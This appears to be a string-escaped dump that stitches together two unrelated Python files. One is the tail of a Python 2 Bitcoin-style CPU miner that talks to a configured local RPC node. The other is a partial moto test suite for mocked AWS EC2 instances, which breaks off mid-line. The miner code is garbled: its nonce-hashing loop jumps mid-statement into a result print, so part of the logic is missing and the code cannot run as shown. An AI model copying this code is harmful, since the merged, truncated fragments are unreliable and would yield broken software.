|\n\t\t\t(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))\n\ndef bufreverse(in_buf):\n\tout_words = []\n\tfor i in range(0, len(in_buf), 4):\n\t\tword = struct.unpack(\'@I\', in_buf[i:i+4])[0]\n\t\tout_words.append(struct.pack(\'@I\', bytereverse(word)))\n\treturn \'\'.join(out_words)\n\ndef wordreverse(in_buf):\n\tout_words = []\n\tfor i in range(0, len(in_buf), 4):\n\t\tout_words.append(in_buf[i:i+4])\n\tout_words.reverse()\n\treturn \'\'.join(out_words)\n\nclass Miner:\n\tdef __init__(self, id):\n\t\tself.id = id\n\t\tself.max_nonce = MAX_NONCE\n\n\tdef work(self, datastr, targetstr):\n\t\t# decode work data hex string to binary\n\t\tstatic_data = datastr.decode(\'hex\')\n\t\tstatic_data = bufreverse(static_data)\n\n\t\t# the first 76b of 80b do not change\n\t\tblk_hdr = static_data[:76]\n\n\t\t# decode 256-bit target value\n\t\ttargetbin = targetstr.decode(\'hex\')\n\t\ttargetbin = targetbin[::-1]\t# byte-swap and dword-swap\n\t\ttargetbin_str = targetbin.encode(\'hex\')\n\t\ttarget = long(targetbin_str, 16)\n\n\t\t# pre-hash first 76b of block header\n\t\tstatic_hash = hashlib.sha256()\n\t\tstatic_hash.update(blk_hdr)\n\n\t\tfor nonce in xrange(self.max_nonce):\n\n\t\t\t# encode 32-bit nonce value\n\t\t\tnonce_bin = struct.pack("" Upstream RPC result:"", result\n\n\tdef iterate(self, rpc):\n\t\twork = rpc.getwork()\n\t\tif work is None:\n\t\t\ttime.sleep(ERR_SLEEP)\n\t\t\treturn\n\t\tif \'data\' not in work or \'target\' not in work:\n\t\t\ttime.sleep(ERR_SLEEP)\n\t\t\treturn\n\n\t\ttime_start = time.time()\n\n\t\t(hashes_done, nonce_bin) = self.work(work[\'data\'],\n\t\t\t\t\t\t work[\'target\'])\n\n\t\ttime_end = time.time()\n\t\ttime_diff = time_end - time_start\n\n\t\tself.max_nonce = long(\n\t\t\t(hashes_done * settings[\'scantime\']) / time_diff)\n\t\tif self.max_nonce > 0xfffffffaL:\n\t\t\tself.max_nonce = 0xfffffffaL\n\n\t\tif settings[\'hashmeter\']:\n\t\t\tprint ""HashMeter(%d): %d hashes, %.2f Khash/sec"" % (\n\t\t\t self.id, hashes_done,\n\t\t\t (hashes_done / 1000.0) / time_diff)\n\n\t\tif nonce_bin is not None:\n\t\t\tself.submit_work(rpc, work[\'data\'], nonce_bin)\n\n\tdef loop(self):\n\t\trpc = BitcoinRPC(settings[\'host\'], settings[\'port\'],\n\t\t\t\t settings[\'rpcuser\'], settings[\'rpcpass\'])\n\t\tif rpc is None:\n\t\t\treturn\n\n\t\twhile True:\n\t\t\tself.iterate(rpc)\n\ndef miner_thread(id):\n\tminer = Miner(id)\n\tminer.loop()\n\nif __name__ == \'__main__\':\n\tif len(sys.argv) != 2:\n\t\tprint ""Usage: pyminer.py CONFIG-FILE""\n\t\tsys.exit(1)\n\n\tf = open(sys.argv[1])\n\tfor line in f:\n\t\t# skip comment lines\n\t\tm = re.search(\'^\\s*#\', line)\n\t\tif m:\n\t\t\tcontinue\n\n\t\t# parse key=value lines\n\t\tm = re.search(\'^(\\w+)\\s*=\\s*(\\S.*)$\', line)\n\t\tif m is None:\n\t\t\tcontinue\n\t\tsettings[m.group(1)] = m.group(2)\n\tf.close()\n\n\tif \'host\' not in settings:\n\t\tsettings[\'host\'] = \'127.0.0.1\'\n\tif \'port\' not in settings:\n\t\tsettings[\'port\'] = 9131\n\tif \'threads\' not in settings:\n\t\tsettings[\'threads\'] = 1\n\tif \'hashmeter\' not in settings:\n\t\tsettings[\'hashmeter\'] = 0\n\tif \'scantime\' not in settings:\n\t\tsettings[\'scantime\'] = 30L\n\tif \'rpcuser\' not in settings or \'rpcpass\' not in settings:\n\t\tprint ""Missing username and/or password in cfg file""\n\t\tsys.exit(1)\n\n\tsettings[\'port\'] = int(settings[\'port\'])\n\tsettings[\'threads\'] = int(settings[\'threads\'])\n\tsettings[\'hashmeter\'] = int(settings[\'hashmeter\'])\n\tsettings[\'scantime\'] = long(settings[\'scantime\'])\n\n\tthr_list = []\n\tfor thr_id in range(settings[\'threads\']):\n\t\tp = Process(target=miner_thread, args=(thr_id,))\n\t\tp.start()\n\t\tthr_list.append(p)\n\t\ttime.sleep(1)\t\t\t# stagger threads\n\n\tprint settings[\'threads\'], ""mining threads started""\n\n\tprint time.asctime(), ""Miner Starts - %s:%s"" % (settings[\'host\'], settings[\'port\'])\n\ttry:\n\t\tfor thr_proc in thr_list:\n\t\t\tthr_proc.join()\n\texcept KeyboardInterrupt:\n\t\tpass\n\tprint time.asctime(), ""Miner Stops - %s:%s"" % (settings[\'host\'], settings[\'port\'])\n\n', 'from __future__ import unicode_literals\n\nfrom botocore.exceptions import ClientError\n\nimport pytest\nfrom unittest import SkipTest\n\nimport base64\nimport ipaddress\n\nimport six\nimport boto\nimport boto3\nfrom boto.ec2.instance import Reservation, InstanceAttribute\nfrom boto.exception import EC2ResponseError\nfrom freezegun import freeze_time\nimport sure # noqa\n\nfrom moto import mock_ec2_deprecated, mock_ec2, settings\nfrom tests import EXAMPLE_AMI_ID\nfrom tests.helpers import requires_boto_gte\n\n\nif six.PY2:\n decode_method = base64.decodestring\nelse:\n decode_method = base64.decodebytes\n\n################ Test Readme ###############\ndef add_servers(ami_id, count):\n conn = boto.connect_ec2()\n for index in range(count):\n conn.run_instances(ami_id)\n\n\n@mock_ec2_deprecated\ndef test_add_servers():\n add_servers(EXAMPLE_AMI_ID, 2)\n\n conn = boto.connect_ec2()\n reservations = conn.get_all_reservations()\n assert len(reservations) == 2\n instance1 = reservations[0].instances[0]\n assert instance1.image_id == EXAMPLE_AMI_ID\n\n\n############################################\n\n\n@freeze_time(""2014-01-01 05:00:00"")\n@mock_ec2_deprecated\ndef test_instance_launch_and_terminate():\n conn = boto.ec2.connect_to_region(""us-east-1"")\n\n with pytest.raises(EC2ResponseError) as ex:\n reservation = conn.run_instances(EXAMPLE_AMI_ID, dry_run=True)\n ex.value.error_code.should.equal(""DryRunOperation"")\n ex.value.status.should.equal(400)\n ex.value.message.should.equal(\n ""An error occurred (DryRunOperation) when calling the RunInstance operation: Request would have succeeded, but DryRun flag is set""\n )\n\n reservation = conn.run_instances(EXAMPLE_AMI_ID)\n reservation.should.be.a(Reservation)\n reservation.instances.should.have.length_of(1)\n instance = reservation.instances[0]\n instance.state.should.equal(""pending"")\n\n reservations = conn.get_all_reservations()\n reservations.should.have.length_of(1)\n reservations[0].id.should.equal(reservation.id)\n instances = reservations[0].instances\n instances.should.have.length_of(1)\n instance = instances[0]\n instance.id.should.equal(instance.id)\n instance.state.should.equal(""running"")\n instance.launch_time.should.equal(""2014-01-01T05:00:00.000Z"")\n instance.vpc_id.shouldnt.equal(None)\n instance.placement.should.equal(""us-east-1a"")\n\n root_device_name = instance.root_device_name\n instance.block_device_mapping[root_device_name].status.should.equal(""in-use"")\n volume_id = instance.block_device_mapping[root_device_name].volume_id\n volume_id.should.match(r""vol-\\w+"")\n\n volume = conn.get_all_volumes(volume_ids=[volume_id])[0]\n volume.attach_data.instance_id.should.equal(instance.id)\n volume.status.should.equal(""in-use"")\n\n with pytest.raises(EC2ResponseError) as ex:\n conn.terminate_instances([instance.id], dry_run=True)\n ex.value.error_code.should.equal(""DryRunOperation"")\n ex.value.status.should.equal(400)\n ex.value.message.should.equal(\n ""An error occurred (DryRunOperation) when calling the TerminateInstance operation: Request would have succeeded, but DryRun flag is set""\n )\n\n conn.terminate_instances([instance.id])\n\n reservations = conn.get_all_reservations()\n instance = reservations[0].instances[0]\n instance.state.should.equal(""terminated"")\n\n\n@mock_ec2\ndef test_instance_terminate_discard_volumes():\n\n ec2_resource = boto3.resource(""ec2"", ""us-west-1"")\n\n result = ec2_resource.create_instances(\n ImageId=EXAMPLE_AMI_ID,\n MinCount=1,\n MaxCount=1,\n BlockDeviceMappings=[\n {\n ""DeviceName"": ""/dev/sda1"",\n ""Ebs"": {""VolumeSize"": 50, ""DeleteOnTermination"": True},\n }\n ],\n )\n instance = result[0]\n\n instance_volume_ids = []\n for volume in instance.volumes.all():\n instance_volume_ids.append(volume.volume_id)\n\n instance.terminate()\n instance.wait_until_terminated()\n\n assert not list(ec2_resource.volumes.all())\n\n\n@mock_ec2\ndef test_instance_terminate_keep_volumes_explicit():\n\n ec2_resource = boto3.resource(""ec2"", ""us-west-1"")\n\n result = ec2_resource.create_instances(\n ImageId=EXAMPLE_AMI_ID,\n MinCount=1,\n MaxCount=1,\n BlockDeviceMappings=[\n {\n ""DeviceName"": ""/dev/sda1"",\n ""Ebs"": {""VolumeSize"": 50, ""DeleteOnTermination"": False},\n }\n ],\n )\n instance = result[0]\n\n instance_volume_ids = []\n for volume in instance.volumes.all():\n instance_volume_ids.append(volume.volume_id)\n\n instance.terminate()\n instance.wait_until_terminated()\n\n assert len(list(ec2_resource.volumes.all())) == 1\n\n\n@mock_ec2\ndef test_instance_terminate_keep_volumes_implicit():\n ec2_resource = boto3.resource(""ec2"", ""us-west-1"")\n\n result = ec2_resource.create_instances(\n ImageId=EXAMPLE_AMI_ID,\n MinCount=1,\n MaxCount=1,\n BlockDeviceMappings=[{""DeviceName"": ""/dev/sda1"", ""Ebs"": {""VolumeSize"": 50}}],\n )\n instance = result[0]\n\n instance_volume_ids = []\n for volume in instance.volumes.all():\n instance_volume_ids.append(volume.volume_id)\n\n instance.terminate()\n instance.wait_until_terminated()\n\n assert len(instance_volume_ids) == 1\n volume = ec2_resource.Volume(instance_volume_ids[0])\n volume.state.should.equal(""available"")\n\n\n@mock_ec2\ndef test_instance_terminate_detach_volumes():\n ec2_resource = boto3.resource(""ec2"", ""us-west-1"")\n result = ec2_resource.create_instances(\n ImageId=EXAMPLE_AMI_ID,\n MinCount=1,\n MaxCount=1,\n BlockDeviceMappings=[\n {""DeviceName"": ""/dev/sda1"", ""Ebs"": {""VolumeSize"": 50}},\n {""DeviceName"": ""/dev/sda2"", ""Ebs"": {""VolumeSize"": 50}},\n ],\n )\n instance = result[0]\n for volume in instance.volumes.all():\n response = instance.detach_volume(VolumeId=volume.volume_id)\n response[""State""].should.equal(""detaching"")\n\n instance.terminate()\n instance.wait_until_terminated()\n\n assert len(list(ec2_resource.volumes.all())) == 2\n\n\n@mock_ec2\ndef test_instance_detach_volume_wrong_path():\n ec2_resource = boto3.resource(""ec2"", ""us-west-1"")\n result = ec2_resource.create_instances(\n ImageId=EXAMPLE_AMI_ID,\n MinCount=1,\n MaxCount=1,\n BlockDeviceMappings=[{""DeviceName"": ""/dev/sda1"", ""Ebs"": {""VolumeSize"": 50}},],\n )\n instance = result[0]\n for volume in instance.volumes.all():\n with pytest.raises(ClientError) as ex:\n instance.detach_volume(VolumeId=volume.volume_id, Device=""/dev/sdf"")\n\n ex.value.response[""Error""][""Code""].should.equal(""InvalidAttachment.NotFound"")\n ex.value.response[""ResponseMetadata""][""HTTPStatusCode""].should.equal(400)\n ex.value.response[""Error""][""Message""].should.equal(\n ""The volume {0} is not attached to instance {1} as device {2}"".format(\n volume.volume_id, instance.instance_id, ""/dev/sdf""\n )\n )\n\n\n@mock_ec2_deprecated\ndef test_terminate_empty_instances():\n conn = boto.connect_ec2(""the_key"", ""the_secret"")\n conn.terminate_instances.when.called_with([]).should.throw(EC2ResponseError)\n\n\n@freeze_time(""2014-01-01 05:00:00"")\n@mock_ec2_deprecated\ndef test_instance_attach_volume():\n conn = boto.connect_ec2(""the_key"", ""the_secret"")\n reservation = conn.run_instances(EXAMPLE_AMI_ID)\n instance = reservation.instances[0]\n\n vol1 = conn.create_volume(size=36, zone=conn.region.name)\n vol1.attach(instance.id, ""/dev/sda1"")\n vol1.update()\n vol2 = conn.create_volume(size=65, zone=conn.region.name)\n vol2.attach(instance.id, ""/dev/sdb1"")\n vol2.update()\n vol3 = conn.create_volume(size=130, zone=conn.region.name)\n vol3.attach(instance.id, ""/dev/sdc1"")\n vol3.update()\n\n reservations = conn.get_all_reservations()\n instance = reservations[0].instances[0]\n\n instance.block_device_mapping.should.have.length_of(3)\n\n for v in conn.get_all_volumes(\n volume_ids=[instance.block_device_mapping[""/dev/sdc1""].volume_id]\n ):\n v.attach_data.instance_id.should.equal(instance.id)\n # can do due to freeze_time decorator.\n v.attach_data.attach_time.should.equal(instance.launch_time)\n # can do due to freeze_time decorator.\n v.create_time.should.equal(instance.launch_time)\n v.region.name.should.equal(instance.region.name)\n v.status.should.equal(""in-use"")\n\n\n@mock_ec2_deprecated\ndef test_get_instances_by_id():\n conn = boto.connect_ec2()\n reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=2)\n instance1, instance2 = reservation.instances\n\n reservations = conn.get_all_reservations(instance_ids=[instance1.id])\n reservations.should.have.length_of(1)\n reservation = reservations[0]\n reservation.instances.should.have.length_of(1)\n reservation.instances[0].id.should.equal(instance1.id)\n\n reservations = conn.get_all_reservations(instance_ids=[instance1.id, instance2.id])\n reservations.should.have.length_of(1)\n reservation = reservations[0]\n reservation.instances.should.have.length_of(2)\n instance_ids = [instance.id for instance in reservation.instances]\n instance_ids.should.equal([instance1.id, instance2.id])\n\n # Call get_all_reservations with a bad id should raise an error\n with pytest.raises(EC2ResponseError) as cm:\n conn.get_all_reservations(instance_ids=[instance1.id, ""i-1234abcd""])\n cm.value.code.should.equal(""InvalidInstanceID.NotFound"")\n cm.value.status.should.equal(400)\n cm.value.request_id.should_not.be.none\n\n\n@mock_ec2\ndef test_get_paginated_instances():\n client = boto3.client(""ec2"", region_name=""us-east-1"")\n conn = boto3.resource(""ec2"", ""us-east-1"")\n for i in range(100):\n conn.create_instances(ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1)\n resp = client.describe_instances(MaxResults=50)\n reservations = resp[""Reservations""]\n reservations.should.have.length_of(50)\n next_token = resp[""NextToken""]\n next_token.should_not.be.none\n resp2 = client.describe_instances(NextToken=next_token)\n reservations.extend(resp2[""Reservations""])\n reservations.should.have.length_of(100)\n assert ""NextToken"" not in resp2.keys()\n\n\n@mock_ec2\ndef test_create_with_tags():\n ec2 = boto3.client(""ec2"", region_name=""us-west-2"")\n instances = ec2.run_instances(\n ImageId=EXAMPLE_AMI_ID,\n MinCount=1,\n MaxCount=1,\n InstanceType=""t2.micro"",\n TagSpecifications=[\n {\n ""ResourceType"": ""instance"",\n ""Tags"": [\n {""Key"": ""MY_TAG1"", ""Value"": ""MY_VALUE1""},\n {""Key"": ""MY_TAG2"", ""Value"": ""MY_VALUE2""},\n ],\n },\n {\n ""ResourceType"": ""instance"",\n ""Tags"": [{""Key"": ""MY_TAG3"", ""Value"": ""MY_VALUE3""}],\n },\n ],\n )\n assert ""Tags"" in instances[""Instances""][0]\n len(instances[""Instances""][0][""Tags""]).should.equal(3)\n\n\n@mock_ec2_deprecated\ndef test_get_instances_filtering_by_state():\n conn = boto.connect_ec2()\n reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=3)\n instance1, instance2, instance3 = reservation.instances\n\n conn.terminate_instances([instance1.id])\n\n reservations = conn.get_all_reservations(filters={""instance-state-name"": ""running""})\n reservations.should.have.length_of(1)\n # Since we terminated instance1, only instance2 and instance3 should be\n # returned\n instance_ids = [instance.id for instance in reservations[0].instances]\n set(instance_ids).should.equal(set([instance2.id, instance3.id]))\n\n reservations = conn.get_all_reservations(\n [instance2.id], filters={""instance-state-name"": ""running""}\n )\n reservations.should.have.length_of(1)\n instance_ids = [instance.id for instance in reservations[0].instances]\n instance_ids.should.equal([instance2.id])\n\n reservations = conn.get_all_reservations(\n [instance2.id], filters={""instance-state-name"": ""terminated""}\n )\n list(reservations).should.equal([])\n\n # get_all_reservations should still return all 3\n reservations = conn.get_all_reservations()\n reservations[0].instances.should.have.length_of(3)\n\n conn.get_all_reservations.when.called_with(\n filters={""not-implemented-filter"": ""foobar""}\n ).should.throw(NotImplementedError)\n\n\n@mock_ec2_deprecated\ndef test_get_instances_filtering_by_instance_id():\n conn = boto.connect_ec2()\n reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=3)\n instance1, instance2, instance3 = reservation.instances\n\n reservations = conn.get_all_reservations(filters={""instance-id"": instance1.id})\n # get_all_reservations should return just instance1\n reservations[0].instances.should.have.length_of(1)\n reservations[0].instances[0].id.should.equal(instance1.id)\n\n reservations = conn.get_all_reservations(\n filters={""instance-id"": [instance1.id, instance2.id]}\n )\n # get_all_reservations should return two\n reservations[0].instances.should.have.length_of(2)\n\n reservations = conn.get_all_reservations(filters={""instance-id"": ""non-existing-id""})\n reservations.should.have.length_of(0)\n\n\n@mock_ec2_deprecated\ndef test_get_instances_filtering_by_instance_type():\n conn = boto.connect_ec2()\n reservation1 = conn.run_instances(EXAMPLE_AMI_ID, instance_type=""m1.small"")\n instance1 = reservation1.instances[0]\n reservation2 = conn.run_instances(EXAMPLE_AMI_ID, instance_type=""m1.small"")\n instance2 = reservation2.instances[0]\n reservation3 = conn.run_instances(EXAMPLE_AMI_ID, instance_type=""t1.micro"")\n instance3 = reservation3.instances[0]\n\n reservations = conn.get_all_reservations(filters={""instance-type"": ""m1.small""})\n # get_all_reservations should return instance1,2\n reservations.should.have.length_of(2)\n reservations[0].instances.should.have.length_of(1)\n reservations[1].instances.should.have.length_of(1)\n instance_ids = [reservations[0].instances[0].id, reservations[1].instances[0].id]\n set(instance_ids).should.equal(set([instance1.id, instance2.id]))\n\n reservations = conn.get_all_reservations(filters={""instance-type"": ""t1.micro""})\n # get_all_reservations should return one\n reservations.should.have.length_of(1)\n reservations[0].instances.should.have.length_of(1)\n reservations[0].instances[0].id.should.equal(instance3.id)\n\n reservations = conn.get_all_reservations(\n filters={""instance-type"": [""t1.micro"", ""m1.small""]}\n )\n reservations.should.have.length_of(3)\n reservations[0].instances.should.have.length_of(1)\n reservations[1].instances.should.have.length_of(1)\n reservations[2].instances.should.have.length_of(1)\n instance_ids = [\n reservations[0].instances[0].id,\n reservations[1].instances[0].id,\n reservations[2].instances[0].id,\n ]\n set(instance_ids).should.equal(set([instance1.id, instance2.id, instance3.id]))\n\n reservations = conn.get_all_reservations(filters={""instance-type"": ""bogus""})\n # bogus instance-type should return none\n reservations.should.have.length_of(0)\n\n\n@mock_ec2_deprecated\ndef test_get_instances_filtering_by_reason_code():\n conn = boto.connect_ec2()\n reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=3)\n instance1, instance2, instance3 = reservation.instances\n instance1.stop()\n instance2.terminate()\n\n reservations = conn.get_all_reservations(\n filters={""state-reason-code"": ""Client.UserInitiatedShutdown""}\n )\n # get_all_reservations should return instance1 and instance2\n reservations[0].instances.should.have.length_of(2)\n set([instance1.id, instance2.id]).should.equal(\n set([i.id for i in reservations[0].instances])\n )\n\n reservations = conn.get_all_reservations(filters={""state-reason-code"": """"})\n # get_all_reservations should return instance 3\n reservations[0].instances.should.have.length_of(1)\n reservations[0].instances[0].id.should.equal(instance3.id)\n\n\n@mock_ec2_deprecated\ndef test_get_instances_filtering_by_source_dest_check():\n conn = boto.connect_ec2()\n reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=2)\n instance1, instance2 = reservation.instances\n conn.modify_instance_attribute(\n instance1.id, attribute=""sourceDestCheck"", value=False\n )\n\n source_dest_check_false = conn.get_all_reservations(\n filters={""source-dest-check"": ""false""}\n )\n source_dest_check_true = conn.get_all_reservations(\n filters={""source-dest-check"": ""true""}\n )\n\n source_dest_check_false[0].instances.should.have.length_of(1)\n source_dest_check_false[0].instances[0].id.should.equal(instance1.id)\n\n source_dest_check_true[0].instances.should.have.length_of(1)\n source_dest_check_true[0].instances[0].id.should.equal(instance2.id)\n\n\n@mock_ec2_deprecated\ndef test_get_instances_filtering_by_vpc_id():\n conn = boto.connect_vpc(""the_key"", ""the_secret"")\n vpc1 = conn.create_vpc(""10.0.0.0/16"")\n subnet1 = conn.create_subnet(vpc1.id, ""10.0.0.0/27"")\n reservation1 = conn.run_instances(EXAMPLE_AMI_ID, min_count=1, subnet_id=subnet1.id)\n instance1 = reservation1.instances[0]\n\n vpc2 = conn.create_vpc(""10.1.0.0/16"")\n subnet2 = conn.create_subnet(vpc2.id, ""10.1.0.0/27"")\n reservation2 = conn.run_instances(EXAMPLE_AMI_ID, min_count=1, subnet_id=subnet2.id)\n instance2 = reservation2.instances[0]\n\n reservations1 = conn.get_all_reservations(filters={""vpc-id"": vpc1.id})\n reservations1.should.have.length_of(1)\n reservations1[0].instances.should.have.length_of(1)\n reservations1[0].instances[0].id.should.equal(instance1.id)\n reservations1[0].instances[0].vpc_id.should.equal(vpc1.id)\n reservations1[0].instances[0].subnet_id.should.equal(subnet1.id)\n\n reservations2 = conn.get_all_reservations(filters={""vpc-id"": vpc2.id})\n reservations2.should.have.length_of(1)\n reservations2[0].instances.should.have.length_of(1)\n reservations2[0].instances[0].id.should.equal(instance2.id)\n reservations2[0].instances[0].vpc_id.should.equal(vpc2.id)\n reservations2[0].instances[0].subnet_id.should.equal(subnet2.id)\n\n\n@mock_ec2_deprecated\ndef test_get_instances_filtering_by_architecture():\n conn = boto.connect_ec2()\n reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=1)\n instance = reservation.instances\n\n reservations = conn.get_all_reservations(filters={""architecture"": ""x86_64""})\n # get_all_reservations should return the instance\n reservations[0].instances.should.have.length_of(1)\n\n\n@mock_ec2\ndef test_get_instances_filtering_by_image_id():\n client = boto3.client(""ec2"", region_name=""us-east-1"")\n conn = boto3.resource(""ec2"", ""us-east-1"")\n conn.create_instances(ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1)\n\n reservations = client.describe_instances(\n Filters=[{""Name"": ""image-id"", ""Values"": [EXAMPLE_AMI_ID]}]\n )[""Reservations""]\n reservations[0][""Instances""].should.have.length_of(1)\n\n\n@mock_ec2\ndef test_get_instances_filtering_by_account_id():\n client = boto3.client(""ec2"", region_name=""us-east-1"")\n conn = boto3.resource(""ec2"", ""us-east-1"")\n conn.create_instances(ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1)\n\n reservations = client.describe_instances(\n Filters=[{""Name"": ""owner-id"", ""Values"": [""123456789012""]}]\n )[""Reservations""]\n\n reservations[0][""Instances""].should.have.length_of(1)\n\n\n@mock_ec2\ndef test_get_instances_filtering_by_private_dns():\n client = boto3.client(""ec2"", region_name=""us-east-1"")\n conn = boto3.resource(""ec2"", ""us-east-1"")\n conn.create_instances(\n ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1, PrivateIpAddress=""127.0.0.1""\n )\n reservations = client.describe_instances(\n Filters=[{""Name"": ""private-dns-name"", ""Values"": [""ip-10-0-0-1.ec2.internal""]}]\n )[""Reservations""]\n reservations[0][""Instances""].should.have.length_of(1)\n\n\n@mock_ec2\ndef test_get_instances_filtering_by_ni_private_dns():\n client = boto3.client(""ec2"", region_name=""us-west-2"")\n conn = boto3.resource(""ec2"", ""us-west-2"")\n conn.create_instances(\n ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1, PrivateIpAddress=""127.0.0.1""\n )\n reservations = client.describe_instances(\n Filters=[\n {\n ""Name"": ""network-interface.private-dns-name"",\n ""Values"": [""ip-10-0-0-1.us-west-2.compute.internal""],\n }\n ]\n )[""Reservations""]\n reservations[0][""Instances""].should.have.length_of(1)\n\n\n@mock_ec2\ndef test_get_instances_filtering_by_instance_group_name():\n client = boto3.client(""ec2"", region_name=""us-east-1"")\n client.create_security_group(Description=""test"", GroupName=""test_sg"")\n client.run_instances(\n ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1, SecurityGroups=[""test_sg""]\n )\n reservations = client.describe_instances(\n Filters=[{""Name"": ""instance.group-name"", ""Values"": [""test_sg""]}]\n )[""Reservations""]\n reservations[0][""Instances""].should.have.length_of(1)\n\n\n@mock_ec2\ndef test_get_instances_filtering_by_instance_group_id():\n client = boto3.client(""ec2"", region_name=""us-east-1"")\n create_sg = client.create_security_group(Description=""test"", GroupName=""test_sg"")\n group_id = create_sg[""GroupId""]\n client.run_instances(\n ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1, SecurityGroups=[""test_sg""]\n )\n reservations = client.describe_instances(\n Filters=[{""Name"": ""instance.group-id"", ""Values"": [group_id]}]\n )[""Reservations""]\n reservations[0][""Instances""].should.have.length_of(1)\n\n\n@mock_ec2\ndef test_get_instances_filtering_by_subnet_id():\n client = boto3.client(""ec2"", region_name=""us-east-1"")\n\n vpc_cidr = ipaddress.ip_network(""192.168.42.0/24"")\n subnet_cidr = ipaddress.ip_network(""192.168.42.0/25"")\n\n resp = client.create_vpc(CidrBlock=str(vpc_cidr),)\n vpc_id = resp[""Vpc""][""VpcId""]\n\n resp = client.create_subnet(CidrBlock=str(subnet_cidr), VpcId=vpc_id)\n subnet_id = resp[""Subnet""][""SubnetId""]\n\n client.run_instances(\n ImageId=EXAMPLE_AMI_ID, MaxCount=1, MinCount=1, SubnetId=subnet_id,\n )\n\n reservations = client.describe_instances(\n Filters=[{""Name"": ""subnet-id"", ""Values"": [subnet_id]}]\n )[""Reservations""]\n reservations.should.have.length_of(1)\n\n\n@mock_ec2_deprecated\ndef test_get_instances_filtering_by_tag():\n conn = boto.connect_ec2()\n reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=3)\n instance1, instance2, instance3 = reservation.instances\n instance1.add_tag(""tag1"", ""value1"")\n instance1.add_tag(""tag2"", ""value2"")\n instance2.add_tag(""tag1"", ""value1"")\n instance2.add_tag(""tag2"", ""wrong value"")\n instance3.add_tag(""tag2"", ""value2"")\n\n reservations = conn.get_all_reservations(filters={""tag:tag0"": ""value0""})\n # get_all_reservations should return no instances\n reservations.should.have.length_of(0)\n\n reservations = conn.get_all_reservations(filters={""tag:tag1"": ""value1""})\n # get_all_reservations should return both instances with this tag value\n reservations.should.have.length_of(1)\n reservations[0].instances.should.have.length_of(2)\n reservations[0].instances[0].id.should.equal(instance1.id)\n reservations[0].instances[1].id.should.equal(instance2.id)\n\n reservations = conn.get_all_reservations(\n filters={""tag:tag1"": ""value1"", ""tag:tag2"": ""value2""}\n )\n # get_all_reservations should return the instance with both tag values\n reservations.should.have.length_of(1)\n reservations[0].instances.should.have.length_of(1)\n reservations[0].instances[0].id.should.equal(instance1.id)\n\n reservations = conn.get_all_reservations(\n filters={""tag:tag1"": ""value1"", ""tag:tag2"": ""value2""}\n )\n # get_all_reservations should return the instance with both tag values\n reservations.should.have.length_of(1)\n reservations[0].instances.should.have.length_of(1)\n reservations[0].instances[0].id.should.equal(instance1.id)\n\n reservations = conn.get_all_reservations(filters={""tag:tag2"": [""value2"", ""bogus""]})\n # get_all_reservations should return both instances with one of the\n # acceptable tag values\n reservations.should.have.length_of(1)\n reservations[0].instances.should.have.length_of(2)\n reservations[0].instances[0].id.should.equal(instance1.id)\n reservations[0].instances[1].id.should.equal(instance3.id)\n\n\n@mock_ec2_deprecated\ndef test_get_instances_filtering_by_tag_value():\n conn = boto.connect_ec2()\n reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=3)\n instance1, instance2, instance3 = reservation.instances\n instance1.add_tag(""tag1"", ""value1"")\n instance1.add_tag(""tag2"", ""value2"")\n instance2.add_tag(""tag1"", ""value1"")\n instance2.add_tag(""tag2"", ""wrong value"")\n instance3.add_tag(""tag2"", ""value2"")\n\n reservations = conn.get_all_reservations(filters={""tag-value"": ""value0""})\n # get_all_reservations should return no instances\n reservations.should.have.length_of(0)\n\n reservations = conn.get_all_reservations(filters={""tag-value"": ""value1""})\n # get_all_reservations should return both instances with this tag value\n reservations.should.have.length_of(1)\n reservations[0].instances.should.have.length_of(2)\n reservations[0].instances[0].id.should.equal(instance1.id)\n reservations[0].instances[1].id.should.equal(instance2.id)\n\n reservations = conn.get_all_reservations(\n filters={""tag-value"": [""value2"", ""value1""]}\n )\n # get_all_reservations should return both instances with one of the\n # acceptable tag values\n reservations.should.have.length_of(1)\n reservations[0].instances.should.have.length_of(3)\n reservations[0].instances[0].id.should.equal(instance1.id)\n reservations[0].instances[1].id.should.equal(instance2.id)\n reservations[0].instances[2].id.should.equal(instance3.id)\n\n reservations = conn.get_all_reservations(filters={""tag-value"": [""value2"", ""bogus""]})\n # get_all_reservations should return both instances with one of the\n # acceptable tag values\n reservations.should.have.length_of(1)\n reservations[0].instances.should.have.length_of(2)\n reservations[0].instances[0].id.should.equal(instance1.id)\n reservations[0].instances[1].id.should.equal(instance3.id)\n\n\n@mock_ec2_deprecated\ndef test_get_instances_filtering_by_tag_name():\n conn = boto.connect_ec2()\n reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=3)\n instance1, instance2, instance3 = reservation.instances\n instance1.add_tag(""tag1"")\n instance1.add_tag(""tag2"")\n instance2.add_tag(""tag1"")\n instance2.add_tag(""tag2X"")\n instance3.add_tag(""tag3"")\n\n reservations = conn.get_all_reservations(filters={""tag-key"": ""tagX""})\n # get_all_reservations should return no instances\n reservations.should.have.length_of(0)\n\n reservations = conn.get_all_reservations(filters={""tag-key"": ""tag1""})\n # get_all_reservations should return both instances with this tag value\n reservations.should.have.length_of(1)\n reservations[0].instances.should.have.length_of(2)\n reservations[0].instances[0].id.should.equal(instance1.id)\n reservations[0].instances[1].id.should.equal(instance2.id)\n\n reservations = conn.get_all_reservations(filters={""tag-key"": [""tag1"", ""tag3""]})\n # get_all_reservations should return both instances with one of the\n # acceptable tag values\n reservations.should.have.length_of(1)\n reservations[0].instances.should.have.length_of(3)\n reservations[0].instances[0].id.should.equal(instance1.id)\n reservations[0].instances[1].id.should.equal(instance2.id)\n reservations[0].instances[2].id.should.equal(instance3.id)\n\n\n@mock_ec2_deprecated\ndef test_instance_start_and_stop():\n conn = 